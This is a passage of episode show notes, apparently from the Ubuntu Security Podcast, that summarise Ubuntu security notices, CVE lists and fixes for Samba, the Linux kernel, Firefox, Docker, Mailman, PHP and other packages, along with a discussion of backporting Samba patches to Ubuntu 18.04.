                                                                                                                                                                                                                  previously fallback to a local user but now does not to avoid someone
                                                                                                                                                                                                                  specifying DOMAIN/root and then having that fallback to say root on the
                                                                                                                                                                                                                  local machine
                                                                                                                                                                                                                • https://www.samba.org/samba/security/CVE-2020-25717.html
                                                                                                                                                                                                                • [USN-5144-1] OpenEXR vulnerability [05:55]
                                                                                                                                                                                                                  • 1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
                                                                                                                                                                                                                    • CVE-2021-3933
                                                                                                                                                                                                                    • Integer overflow -> buffer overflow -> crash / RCE
                                                                                                                                                                                                                    • [USN-5145-1] PostgreSQL vulnerabilities [06:08]
                                                                                                                                                                                                                      • 2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                                                                                                                                        • CVE-2021-23222
                                                                                                                                                                                                                        • CVE-2021-23214
                                                                                                                                                                                                                        • Incorrect handling of SSL cert verification - could allow a remote
                                                                                                                                                                                                                        • attacker to inject arbitrary SQL queries on the initial connection
                                                                                                                                                                                                                          establishment (similar to various STARTTLS vulns which have been seen
                                                                                                                                                                                                                          recently) - would process data sent in the clear before the TLS
                                                                                                                                                                                                                          connection had been established but should just throw this away
                                                                                                                                                                                                                        • New upstream release with other bug fixes too (13.5 - impish/hirsute,
                                                                                                                                                                                                                        • 12.9 - focal, 10.19 - bionic)
                                                                                                                                                                                                                          [USN-5147-1] Vim vulnerabilities [07:13]
                                                                                                                                                                                                                          • 6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                                                                                                                                            • CVE-2021-3928
                                                                                                                                                                                                                            • CVE-2021-3927
                                                                                                                                                                                                                            • CVE-2021-3903
                                                                                                                                                                                                                            • CVE-2021-3872
                                                                                                                                                                                                                            • CVE-2019-20807
                                                                                                                                                                                                                            • CVE-2017-17087
                                                                                                                                                                                                                            • Swap file permissions handling, restricted mode bypass (shouldn’t be
                                                                                                                                                                                                                            • considered a real security mechanism), various memory corruption issues
                                                                                                                                                                                                                              too
                                                                                                                                                                                                                              [USN-5149-1] AccountsService vulnerability [08:01]
                                                                                                                                                                                                                              • 1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                                                                                                                                                • CVE-2021-3939
                                                                                                                                                                                                                                • Double free in SetLanguage() DBus method - memory corruption in root
                                                                                                                                                                                                                                • daemon which can be triggered by an unprivileged user - is due to a
                                                                                                                                                                                                                                  Ubuntu specific patch which we include so that when the user selects a
                                                                                                                                                                                                                                  language / format we save this in their ~/.pam_environment to keep
                                                                                                                                                                                                                                  settings in sync
                                                                                                                                                                                                                                • Patch contained code to use an existing pointer but then freed it - and
                                                                                                                                                                                                                                • then it would get freed again by the original code
                                                                                                                                                                                                                                • Priv-esc by getting accountsservice daemon to run arbitrary code
                                                                                                                                                                                                                                • [USN-5148-1] hivex vulnerability [09:24]
                                                                                                                                                                                                                                  • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                                                                                                                                                    • CVE-2021-3504
                                                                                                                                                                                                                                    • Tools for handling Windows Registry hive files
                                                                                                                                                                                                                                    • OOB read with specially crafted input file -> crash -> DoS
                                                                                                                                                                                                                                    • Goings on in Ubuntu Security Community
                                                                                                                                                                                                                                      How to handle large security updates in outdated software versions? [09:56]
                                                                                                                                                                                                                                      • Samba updates in [USN-5142-1] do not include Bionic
                                                                                                                                                                                                                                      • Upstream released a new 4.13.14 which we could upgrade to in F/H/I/J
                                                                                                                                                                                                                                      • without a lot of work or risk of regression since those releases already
                                                                                                                                                                                                                                        used a more recent version like 4.11 etc so the change in behaviour as a
                                                                                                                                                                                                                                        result of upgrading was so large and other packages in the archive were
                                                                                                                                                                                                                                        still compatible with this new version
                                                                                                                                                                                                                                      • Upstream has released patches for these vulns back to 4.10 but this is
                                                                                                                                                                                                                                      • 686 individual patches - bionic has Samba 4.7 and so would require a lot
                                                                                                                                                                                                                                        of manual work to backport these ~700 patches, and the risk of
                                                                                                                                                                                                                                        introducing a regression (ie breaking something) when backporting such a
                                                                                                                                                                                                                                        large set of changes is higher
                                                                                                                                                                                                                                        • We are security engineers not full-time Samba software developers so
                                                                                                                                                                                                                                        • not cognisant of all the possible pitfalls etc
                                                                                                                                                                                                                                        • Other option would be to update Samba in bionic to 4.13.14 like in the
                                                                                                                                                                                                                                        • later releases, other packages like talloc, tdb, tevent and ldb and these
                                                                                                                                                                                                                                          would all need to be upgraded as well
                                                                                                                                                                                                                                        • But this new Samba version only supports python3, not python2.7 which the
                                                                                                                                                                                                                                        • older Samba currently in bionic does
                                                                                                                                                                                                                                        • FreeIPA in bionic is Python2 so would then be broken if we did this upgrade
                                                                                                                                                                                                                                        • We could also try and upgrade FreeIPA to a newer version which uses
                                                                                                                                                                                                                                        • Python3 but it isn’t clear if the required Python3 dependencies even
                                                                                                                                                                                                                                          exist in the 18.04 archive - so they man need to be backported and
                                                                                                                                                                                                                                          introduced there as well
                                                                                                                                                                                                                                        • Either option involves a lot of change and hence complexity ∴ a high risk
                                                                                                                                                                                                                                        • of regression
                                                                                                                                                                                                                                        • Unclear yet which will be the preferred option but this illustrates the
                                                                                                                                                                                                                                        • difficulties involved in doing security support for old software versions
                                                                                                                                                                                                                                          which upstream has ceased to provide support
                                                                                                                                                                                                                                        • Will likely come across more cases like this as we get further into ESM
                                                                                                                                                                                                                                        • support periods for various packages - Bionic is still in it’s LTS phase
                                                                                                                                                                                                                                          till 2023 so not even in ESM and already has trouble for Samba
                                                                                                                                                                                                                                        • Watch this space…
                                                                                                                                                                                                                                        • Get in contact
                                                                                                                                                                                                                                          • #ubuntu-security on the Libera.Chat IRC network
                                                                                                                                                                                                                                          • ubuntu-hardened mailing list
                                                                                                                                                                                                                                          • Security section on discourse.ubuntu.com
                                                                                                                                                                                                                                          • @ubuntu_sec on twitter
                                                                                                                                                                                                                                          • 16 min
                                                                                                                                                                                                                                          • Episode 137
                                                                                                                                                                                                                                            Overview

                                                                                                                                                                                                                                            This week we look at some details of the 29 unique CVEs addressed across

                                                                                                                                                                                                                                            the supported Ubuntu releases in the past 7 days and more.

                                                                                                                                                                                                                                            This week in Ubuntu Security Updates

                                                                                                                                                                                                                                            29 unique CVEs addressed

                                                                                                                                                                                                                                            [USN-5131-1] Firefox vulnerabilities [00:42]
                                                                                                                                                                                                                                            • 6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                                                                                                                                                              • CVE-2021-38509
                                                                                                                                                                                                                                              • CVE-2021-38508
                                                                                                                                                                                                                                              • CVE-2021-38507
                                                                                                                                                                                                                                              • CVE-2021-38506
                                                                                                                                                                                                                                              • CVE-2021-38504
                                                                                                                                                                                                                                              • CVE-2021-38503
                                                                                                                                                                                                                                              • 94.0
                                                                                                                                                                                                                                                • Copy image link - copies final image URL after redirects - if a page
                                                                                                                                                                                                                                                • were to then combine this with a content security policy which blocked
                                                                                                                                                                                                                                                  a redirect, the image URL may then contain any authentication tokens -
                                                                                                                                                                                                                                                  and so if a page could trick a user into copying and pasting that image
                                                                                                                                                                                                                                                  URL into the page an attacker could steal their auth token
                                                                                                                                                                                                                                                • Various web framework issues
                                                                                                                                                                                                                                                • [USN-5132-1] Thunderbird vulnerabilities [01:56]
                                                                                                                                                                                                                                                  • 6 CVEs addressed in Impish (21.10)
                                                                                                                                                                                                                                                    • CVE-2021-38501
                                                                                                                                                                                                                                                    • CVE-2021-38500
                                                                                                                                                                                                                                                    • CVE-2021-38498
                                                                                                                                                                                                                                                    • CVE-2021-38497
                                                                                                                                                                                                                                                    • CVE-2021-38496
                                                                                                                                                                                                                                                    • CVE-2021-32810
                                                                                                                                                                                                                                                    • 91.2.1
                                                                                                                                                                                                                                                      • Usual web framework issues
                                                                                                                                                                                                                                                      • [USN-5133-1] ICU vulnerability [02:17]
                                                                                                                                                                                                                                                        • 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
                                                                                                                                                                                                                                                          • CVE-2020-21913
                                                                                                                                                                                                                                                          • unicode handling library
                                                                                                                                                                                                                                                          • UAF - could be triggered if was packaging the ICU data with malicious
                                                                                                                                                                                                                                                          • input -> crash / RCU
                                                                                                                                                                                                                                                            [USN-5135-1] Linux kernel vulnerability [02:43]
                                                                                                                                                                                                                                                            • 1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                                                                                                                                                                              • CVE-2021-3759
                                                                                                                                                                                                                                                              • impish (5.13), hirsute (5.11), focal hwe (5.11)
                                                                                                                                                                                                                                                              • IPC memory objects not properly accounted for in memcg - could allow to
                                                                                                                                                                                                                                                              • bypass limits and cause DoS
                                                                                                                                                                                                                                                                [USN-5130-1] Linux kernel vulnerabilities [03:24]
                                                                                                                                                                                                                                                                • 2 CVEs addressed in Trusty ESM (14.04 ESM)
                                                                                                                                                                                                                                                                  • CVE-2020-29660
                                                                                                                                                                                                                                                                  • CVE-2020-29661
                                                                                                                                                                                                                                                                  • 3.13
                                                                                                                                                                                                                                                                  • 2 vulns courtesy of Jann Horn (GPZ) - in tty subsystem - lock order
                                                                                                                                                                                                                                                                  • issues - UAF - DoS/privesc (Episode 106)
                                                                                                                                                                                                                                                                    [USN-5136-1] Linux kernel vulnerabilities [04:06]
                                                                                                                                                                                                                                                                    • 9 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
                                                                                                                                                                                                                                                                      • CVE-2021-42252
                                                                                                                                                                                                                                                                      • CVE-2021-38199
                                                                                                                                                                                                                                                                      • CVE-2021-3759
                                                                                                                                                                                                                                                                      • CVE-2021-3753
                                                                                                                                                                                                                                                                      • CVE-2021-3743
                                                                                                                                                                                                                                                                      • CVE-2021-3655
                                                                                                                                                                                                                                                                      • CVE-2020-36385
                                                                                                                                                                                                                                                                      • CVE-2020-36322
                                                                                                                                                                                                                                                                      • CVE-2019-19449
                                                                                                                                                                                                                                                                      • 4.15 (bionic, xenial hwe, trusty azure)
                                                                                                                                                                                                                                                                      • IPC memory object leak plus various other vulns from Episode 136
                                                                                                                                                                                                                                                                      • [USN-5137-1] Linux kernel vulnerabilities [04:48]
                                                                                                                                                                                                                                                                        • 10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
                                                                                                                                                                                                                                                                          • CVE-2021-42252
                                                                                                                                                                                                                                                                          • CVE-2021-3759
                                                                                                                                                                                                                                                                          • CVE-2021-3753
                                                                                                                                                                                                                                                                          • CVE-2021-3743
                                                                                                                                                                                                                                                                          • CVE-2021-3739
                                                                                                                                                                                                                                                                          • CVE-2021-35477
                                                                                                                                                                                                                                                                          • CVE-2021-34556
                                                                                                                                                                                                                                                                          • CVE-2021-3428
                                                                                                                                                                                                                                                                          • CVE-2020-36385
                                                                                                                                                                                                                                                                          • CVE-2019-19449
                                                                                                                                                                                                                                                                          • 5.4 (focal, bionic hwe)
                                                                                                                                                                                                                                                                          • [USN-5134-1] Docker vulnerability [04:50]
                                                                                                                                                                                                                                                                            • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                                                                                                                                                                                              • CVE-2021-41092
                                                                                                                                                                                                                                                                              • If was using a private registry for docker login but also had configured
                                                                                                                                                                                                                                                                              • credsStore and credsHelper in ~/.docker/config.json and these were not
                                                                                                                                                                                                                                                                                able to be executed (ie. execute bit not set or not in $PATH), then creds
                                                                                                                                                                                                                                                                                would get sent to the public docker registry rather than the configured
                                                                                                                                                                                                                                                                                private registry.
                                                                                                                                                                                                                                                                                Goings on in Ubuntu Security Community
                                                                                                                                                                                                                                                                                Hiring [06:00]
                                                                                                                                                                                                                                                                                Security - Product Manager
                                                                                                                                                                                                                                                                                • HOME BASED - EMEA (Europe, Middle East, Africa)
                                                                                                                                                                                                                                                                                • Role includes:
                                                                                                                                                                                                                                                                                  • guiding the evolution of security offerings from Canonical and Ubuntu
                                                                                                                                                                                                                                                                                  • driving compliance and certification of Ubuntu
                                                                                                                                                                                                                                                                                  • engaging with the open source security community
                                                                                                                                                                                                                                                                                  • telling the story of Canonical’s work to deliver secure platforms
                                                                                                                                                                                                                                                                                  • https://canonical.com/careers/2278145/security-product-manager-remote
                                                                                                                                                                                                                                                                                  • Get in contact
                                                                                                                                                                                                                                                                                    • #ubuntu-security on the Libera.Chat IRC network
                                                                                                                                                                                                                                                                                    • ubuntu-hardened mailing list
                                                                                                                                                                                                                                                                                    • Security section on discourse.ubuntu.com
                                                                                                                                                                                                                                                                                    • @ubuntu_sec on twitter
                                                                                                                                                                                                                                                                                    • 8 min
                                                                                                                                                                                                                                                                                    • Episode 136
                                                                                                                                                                                                                                                                                      Overview

                                                                                                                                                                                                                                                                                      The road to Ubuntu 22.04 LTS begins so we look at some of its planned

                                                                                                                                                                                                                                                                                      features plus we cover security updates for the Linux kernel, Mailman,
                                                                                                                                                                                                                                                                                      Apport, PHP, Bind and more.

                                                                                                                                                                                                                                                                                      This week in Ubuntu Security Updates

                                                                                                                                                                                                                                                                                      92 unique CVEs addressed

                                                                                                                                                                                                                                                                                      [USN-5114-1] Linux kernel vulnerabilities [01:15]
                                                                                                                                                                                                                                                                                      • 4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
                                                                                                                                                                                                                                                                                        • CVE-2021-42008
                                                                                                                                                                                                                                                                                        • CVE-2021-40490
                                                                                                                                                                                                                                                                                        • CVE-2021-38198
                                                                                                                                                                                                                                                                                        • CVE-2020-3702
                                                                                                                                                                                                                                                                                        • 4.15 + HWE on ESM
                                                                                                                                                                                                                                                                                        • Race in ath9k -> could fail to properly encrypt traffic -> info leak
                                                                                                                                                                                                                                                                                        • KVM shadow pages perms -> local user DoS
                                                                                                                                                                                                                                                                                        • ext4 race in xattr handling - local DoS / priv-esc
                                                                                                                                                                                                                                                                                        • 6pack driver validation failure -> DoS / code-exec
                                                                                                                                                                                                                                                                                        • [USN-5115-1] Linux kernel (OEM) vulnerabilities [02:19]
                                                                                                                                                                                                                                                                                          • 16 CVEs addressed in Focal (20.04 LTS)
                                                                                                                                                                                                                                                                                            • CVE-2021-42008
                                                                                                                                                                                                                                                                                            • CVE-2021-40490
                                                                                                                                                                                                                                                                                            • CVE-2021-38205
                                                                                                                                                                                                                                                                                            • CVE-2021-38204
                                                                                                                                                                                                                                                                                            • CVE-2021-38166
                                                                                                                                                                                                                                                                                            • CVE-2021-3759
                                                                                                                                                                                                                                                                                            • CVE-2021-3753
                                                                                                                                                                                                                                                                                            • CVE-2021-3743
                                                                                                                                                                                                                                                                                            • CVE-2021-3739
                                                                                                                                                                                                                                                                                            • CVE-2021-3732
                                                                                                                                                                                                                                                                                            • CVE-2021-37159
                                                                                                                                                                                                                                                                                            • CVE-2021-3679
                                                                                                                                                                                                                                                                                            • CVE-2021-35477
                                                                                                                                                                                                                                                                                            • CVE-2021-34556
                                                                                                                                                                                                                                                                                            • CVE-2021-33624
                                                                                                                                                                                                                                                                                            • CVE-2020-3702
                                                                                                                                                                                                                                                                                            • 5.10 OEM
                                                                                                                                                                                                                                                                                            • As above plus various BPF hardening fixes against spectre-like attacks,
                                                                                                                                                                                                                                                                                            • fixes for security issues in tracing subsystem, overlayfs, btrfs,
                                                                                                                                                                                                                                                                                              Qualcomm IPC router, Xilinx ethernet driver info leak
                                                                                                                                                                                                                                                                                              [USN-5116-1, USN-5116-2] Linux kernel vulnerabilities [02:55]
                                                                                                                                                                                                                                                                                              • 6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
                                                                                                                                                                                                                                                                                                • CVE-2021-42008
                                                                                                                                                                                                                                                                                                • CVE-2021-40490
                                                                                                                                                                                                                                                                                                • CVE-2021-38205
                                                                                                                                                                                                                                                                                                • CVE-2021-38198
                                                                                                                                                                                                                                                                                                • CVE-2021-3732
                                                                                                                                                                                                                                                                                                • CVE-2020-3702
                                                                                                                                                                                                                                                                                                • 5.4 + KVM + bionic HWE + clouds (AWS, Azure, GCP, GKE, IBM, Oracle + RPi)
                                                                                                                                                                                                                                                                                                • Race in ath9k -> could fail to properly encrypt traffic -> info leak
                                                                                                                                                                                                                                                                                                • KVM shadow pages perms -> local user DoS
                                                                                                                                                                                                                                                                                                • ext4 race in xattr handling - local DoS / priv-esc
                                                                                                                                                                                                                                                                                                • 6pack driver validation failure -> DoS / code-exec
                                                                                                                                                                                                                                                                                                • overlayfs + xilinx
                                                                                                                                                                                                                                                                                                • [USN-5117-1] Linux kernel (OEM) vulnerabilities [03:29]
                                                                                                                                                                                                                                                                                                  • 4 CVEs addressed in Focal (20.04 LTS)
                                                                                                                                                                                                                                                                                                    • CVE-2021-3759
                                                                                                                                                                                                                                                                                                    • CVE-2021-3753
                                                                                                                                                                                                                                                                                                    • CVE-2021-3743
                                                                                                                                                                                                                                                                                                    • CVE-2021-3739
                                                                                                                                                                                                                                                                                                    • 5.13 OEM
                                                                                                                                                                                                                                                                                                    • btrfs, qualcomm IPC, VT IOCTL handling, memory leak in IPC object
                                                                                                                                                                                                                                                                                                    • handling
                                                                                                                                                                                                                                                                                                      [USN-5120-1] Linux kernel (Azure) vulnerabilities [03:40]
                                                                                                                                                                                                                                                                                                      • 9 CVEs addressed in Focal (20.04 LTS)
                                                                                                                                                                                                                                                                                                        • CVE-2021-40490
                                                                                                                                                                                                                                                                                                        • CVE-2021-38207
                                                                                                                                                                                                                                                                                                        • CVE-2021-38199
                                                                                                                                                                                                                                                                                                        • CVE-2021-3759
                                                                                                                                                                                                                                                                                                        • CVE-2021-3612
                                                                                                                                                                                                                                                                                                        • CVE-2021-22543
                                                                                                                                                                                                                                                                                                        • CVE-2020-36311
                                                                                                                                                                                                                                                                                                        • CVE-2020-26541
                                                                                                                                                                                                                                                                                                        • CVE-2019-19449
                                                                                                                                                                                                                                                                                                        • 5.8 Azure
                                                                                                                                                                                                                                                                                                        • [USN-5119-1] libcaca vulnerabilities [03:53]
                                                                                                                                                                                                                                                                                                          • 2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM),
                                                                                                                                                                                                                                                                                                          • Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                                                                                                                                                                                                                            • CVE-2021-30499
                                                                                                                                                                                                                                                                                                            • CVE-2021-30498
                                                                                                                                                                                                                                                                                                            • text mode graphics handling library
                                                                                                                                                                                                                                                                                                            • 2 buffer overflows -> crash / code exec in handling of TGA images and
                                                                                                                                                                                                                                                                                                            • when exporting to troff format
                                                                                                                                                                                                                                                                                                              [USN-5121-1, USN-5121-2] Mailman vulnerabilities [04:24]
                                                                                                                                                                                                                                                                                                              • 2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), 5 CVEs
                                                                                                                                                                                                                                                                                                              • addressed in Focal (20.04 LTS)
                                                                                                                                                                                                                                                                                                                • CVE-2021-42096
                                                                                                                                                                                                                                                                                                                • CVE-2021-42097
                                                                                                                                                                                                                                                                                                                • CVE-2020-12137 (20.04 LTS only)
                                                                                                                                                                                                                                                                                                                • CVE-2020-15011 (20.04 LTS only)
                                                                                                                                                                                                                                                                                                                • CVE-2020-12108 (20.04 LTS only)
                                                                                                                                                                                                                                                                                                                • 2 different CSRF attacks against mailman - in first, failed to properly
                                                                                                                                                                                                                                                                                                                • associate CSRF tokens with accounts - could be used to take over
                                                                                                                                                                                                                                                                                                                  another account
                                                                                                                                                                                                                                                                                                                • In second, CSRF tokens which are generated are derived from the admin
                                                                                                                                                                                                                                                                                                                • password - could then allow a remote attacker to use this to help brute
                                                                                                                                                                                                                                                                                                                  force guess admin pw
                                                                                                                                                                                                                                                                                                                • In both cases need to already be an existing list member and be logged
                                                                                                                                                                                                                                                                                                                • in to mount attacks
                                                                                                                                                                                                                                                                                                                • For focal also included a couple medium priority vulns (don’t affect
                                                                                                                                                                                                                                                                                                                • older versions):
                                                                                                                                                                                                                                                                                                                  • Possible arbitrary content injection in 2 different ways which allow
                                                                                                                                                                                                                                                                                                                  • content to be provided by an attacker as POST parameters to form
                                                                                                                                                                                                                                                                                                                    handling scripts which will then be incorporated into the page shown
                                                                                                                                                                                                                                                                                                                    to a user
                                                                                                                                                                                                                                                                                                                  • So could allow an attacker to say inject a URL to be displayed on a
                                                                                                                                                                                                                                                                                                                  • legitimate mailman admin page instance which an unsuspecting user
                                                                                                                                                                                                                                                                                                                    may then follow thinking this is trusted etc.
                                                                                                                                                                                                                                                                                                                    [USN-5122-1, USN-5122-2] Apport vulnerability [05:41]
                                                                                                                                                                                                                                                                                                                    • Affecting Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                                                                                                                                                                                                                                    • Could trick Apport into writing core files into arbitrary directories -
                                                                                                                                                                                                                                                                                                                    • then these could say be interpreted by other root-level applications to
                                                                                                                                                                                                                                                                                                                      escalate privileges
                                                                                                                                                                                                                                                                                                                    • Changed Apport to write core files to known location
                                                                                                                                                                                                                                                                                                                    • /var/lib/apport/coredump
                                                                                                                                                                                                                                                                                                                      [USN-5123-1, USN-5123-2] MySQL vulnerabilities [06:25]
                                                                                                                                                                                                                                                                                                                      • 43 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal
                                                                                                                                                                                                                                                                                                                      • (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35648
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35647
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35646
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35645
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35644
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35643
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35642
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35641
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35640
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35639
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35638
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35637
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35636
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35635
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35634
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35633
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35632
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35631
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35630
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35628
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35627
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35626
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35625
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35624
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35623
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35622
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35613
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35612
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35610
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35608
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35607
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35604
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35602
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35597
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35596
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35591
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35584
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35577
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35575
                                                                                                                                                                                                                                                                                                                        • CVE-2021-35546
                                                                                                                                                                                                                                                                                                                        • CVE-2021-2481
                                                                                                                                                                                                                                                                                                                        • CVE-2021-2479
                                                                                                                                                                                                                                                                                                                        • CVE-2021-2478
                                                                                                                                                                                                                                                                                                                        • 8.0.27 in Ubuntu 20.04 LTS, Ubuntu 21.04 and Ubuntu 21.10
                                                                                                                                                                                                                                                                                                                        • 5.7.36 in Ubuntu 18.04 LTS, Ubuntu 16.04 ESM
                                                                                                                                                                                                                                                                                                                        • https://www.oracle.com/security-alerts/cpuoct2021.html
                                                                                                                                                                                                                                                                                                                        • [USN-5124-1] GNU binutils vulnerabilities [06:53]
                                                                                                                                                                                                                                                                                                                          • 2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
                                                                                                                                                                                                                                                                                                                            • CVE-2021-3487
                                                                                                                                                                                                                                                                                                                            • CVE-2020-16592
                                                                                                                                                                                                                                                                                                                            • 2 issues in libbfd (binary file descriptor) - can be triggered by crafted
                                                                                                                                                                                                                                                                                                                            • files
                                                                                                                                                                                                                                                                                                                              • UAF in when using hash table impl
                                                                                                                                                                                                                                                                                                                              • cause large memory allocation - crash
                                                                                                                                                                                                                                                                                                                              • [USN-5009-2] libslirp vulnerabilities [07:30]
                                                                                                                                                                                                                                                                                                                                • 6 CVEs addressed in Impish (21.10)
                                                                                                                                                                                                                                                                                                                                  • CVE-2021-3595
                                                                                                                                                                                                                                                                                                                                  • CVE-2021-3594
                                                                                                                                                                                                                                                                                                                                  • CVE-2021-3593
                                                                                                                                                                                                                                                                                                                                  • CVE-2021-3592
                                                                                                                                                                                                                                                                                                                                  • CVE-2020-29130
                                                                                                                                                                                                                                                                                                                                  • CVE-2020-29129
                                                                                                                                                                                                                                                                                                                                  • Episode 124
                                                                                                                                                                                                                                                                                                                                  • [USN-5125-1] PHP vulnerability [07:41]
                                                                                                                                                                                                                                                                                                                                    • 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM),
                                                                                                                                                                                                                                                                                                                                    • Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                                                                                                                                                                                                                                                      • CVE-2021-21703
                                                                                                                                                                                                                                                                                                                                      • Root code exec in PHP-FPM - uses a privileged root level process and
                                                                                                                                                                                                                                                                                                                                      • unpriv child worker processes but child could access shared memory with
                                                                                                                                                                                                                                                                                                                                        parent and cause it to do OOB R/W -> code execution in parent -> priv-esc
                                                                                                                                                                                                                                                                                                                                        [USN-5126-1, USN-5126-2] Bind vulnerability [08:33]
                                                                                                                                                                                                                                                                                                                                        • 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM),
                                                                                                                                                                                                                                                                                                                                        • Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                                                                                                                                                                                                                                                          • CVE-2021-25219
                                                                                                                                                                                                                                                                                                                                          • Possible cache poisoning could lead to DoS via excessive entries in the
                                                                                                                                                                                                                                                                                                                                          • cache causing slow lookup performance
                                                                                                                                                                                                                                                                                                                                            [USN-5127-1] WebKitGTK vulnerabilities [08:55]
                                                                                                                                                                                                                                                                                                                                            • 3 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                                                                                                                                                                                                                                                              • CVE-2021-42762
                                                                                                                                                                                                                                                                                                                                              • CVE-2021-30851
                                                                                                                                                                                                                                                                                                                                              • CVE-2021-30846
                                                                                                                                                                                                                                                                                                                                              • Usual web engine vulns - plus one in the bubblewrap launcher which allows
                                                                                                                                                                                                                                                                                                                                              • a limited sandbox bypass - could trick host processors into believing a
                                                                                                                                                                                                                                                                                                                                                sandboxed process was not and hence could potentially escalate privs
                                                                                                                                                                                                                                                                                                                                                [USN-5128-1] Ceph vulnerabilities [09:35]
                                                                                                                                                                                                                                                                                                                                                • 5 CVEs addressed in Bionic (18.04 LTS), Hirsute (21.04)
                                                                                                                                                                                                                                                                                                                                                  • CVE-2021-3531
                                                                                                                                                                                                                                                                                                                                                  • CVE-2021-3524
                                                                                                                                                                                                                                                                                                                                                  • CVE-2021-3509
                                                                                                                                                                                                                                                                                                                                                  • CVE-2021-20288
                                                                                                                                                                                                                                                                                                                                                  • CVE-2020-27781
                                                                                                                                                                                                                                                                                                                                                  • Goings on in Ubuntu Security Community
                                                                                                                                                                                                                                                                                                                                                    22.04 LTS development cycle begins [09:46]
                                                                                                                                                                                                                                                                                                                                                    • Will include all the features from the various interim releases since the
                                                                                                                                                                                                                                                                                                                                                    • last 20.04 LTS plus some more
                                                                                                                                                                                                                                                                                                                                                    • Since is an LTS, this cycle is mostly to be spent making things as solid
                                                                                                                                                                                                                                                                                                                                                    • and stable as possible, but a few new features are planned:
                                                                                                                                                                                                                                                                                                                                                      • nftables supported
                                                                                                                                                                                                                                                                                                                                                        • firewalling on Linux has 2 components - kernel-space mechanism and
                                                                                                                                                                                                                                                                                                                                                        • userspace tooling to control that
                                                                                                                                                                                                                                                                                                                                                        • traditionally kernel supported iptables (aka xtables - ip,ip6,arp,eb -tables)
                                                                                                                                                                                                                                                                                                                                                        • nftables as introduced into the kernel in 3.13 as a new mechanism to
                                                                                                                                                                                                                                                                                                                                                        • implement network packet classification and handling - aka firewalling
                                                                                                                                                                                                                                                                                                                                                          etc
                                                                                                                                                                                                                                                                                                                                                        • kernel has 2 mechanisms then - xtables and nftables
                                                                                                                                                                                                                                                                                                                                                        • userspace then has 2 primary tools for handling these - iptables for
                                                                                                                                                                                                                                                                                                                                                        • xtables and nftables (nft) for nftables
